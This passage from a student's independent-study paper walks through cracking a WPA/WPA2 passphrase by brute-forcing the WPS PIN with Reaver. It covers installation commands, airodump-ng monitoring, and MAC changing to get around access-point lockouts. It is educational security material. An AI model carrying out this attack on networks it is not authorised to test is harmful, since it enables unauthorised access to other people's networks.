Reaver has been designed to be a robust and practical attack against WPS, and has been
tested against a wide variety of access points and WPS implementations.
58
Nuno Freitas
Below there is a flowchart that explains the method used by the Bruteforce attack to the
WPS flaw:
On average Reaver will recover the target AP's plain text WPA/WPA2 passphrase in 410 hours, depending on the AP. In practice, it will generally take half this time to guess
the correct WPS pin and recover the passphrase.
I want to make it clear this will only work on networks with WPS enabled. Since the
Router Ive been using doesnt have WPS I will use a new one with the same
configurations (ESSID and Passphrase).
59
Nuno Freitas
But you dont need to worry, Ill cover how to check if an AP has WPS enabled or not.
First of all, if you need, download Reaver. It doesnt come with Backtrack older
versions so you might have to install it, even though it is easy to do it.
You can download Reaver at http://code.google.com/p/reaver-wps/downloads/list
After you download extract Reaver folder to your desktop or whatever other folder you
want.
By the way Reaver is only supported on the Linux platform, requires the libpcap and
libsqlite3 libraries.
After you extracted the folder, browse to it. Lets do it like if I extracted to my Desktop
folder.
In the shell, browse to the following directory:
#cd /root/Desktop/reaver-1.3/src/
Within this directory you will find several files.
Lets start the installation, run the following command:
# ./configure
If you get this error: bash: ./configure: Permission denied
Use the command:
#chmod +x configure
This will give execution permission to the file configure
Try again, this time you wont have any problems.
# ./configure
Let it install, when it finishes use the following command:
# make
And then:
# make install
Ok, Reaver is installed.
Now we can have some fun with Reaver. Lets start the attack.
Nuno Freitas
Then run:
#airodump-ng mon0
61
Nuno Freitas
62
Nuno Freitas
You can use aircracks fake authentication while running reaver, its up to you.
If you start getting blocked by the AP use macchanger command to change your mac
and start again.
After some hours running Reaver, you will get to the passphrase.
As you can see, we got the passphrase which in this case was security.
63
Nuno Freitas
Conclusions
I hope you all enjoyed this paper as much as I enjoyed writing it. Hopefully, by now
you understand better how insecure most of the Wireless Networks are in our days and
youll be careful next time you configure a Wireless AP.
When I started this Independent Study I had a rough idea of what I wanted to
research/learn about and it was a very rewarding experience. Ive learned more than I
was expecting and I really enjoyed the time I took learning and practicing.
I read books, websites watched videos from which I guided myself but still, I thought
about writing my own paper as a second method of study.
I took the leap after I found a paper like this one and I really wanted as retribution to
write a paper of mine, so other that are in the same situation that I was some months ago
could learn with a simple and pleasant reading since I wrote this paper as I was learning
from zero.
64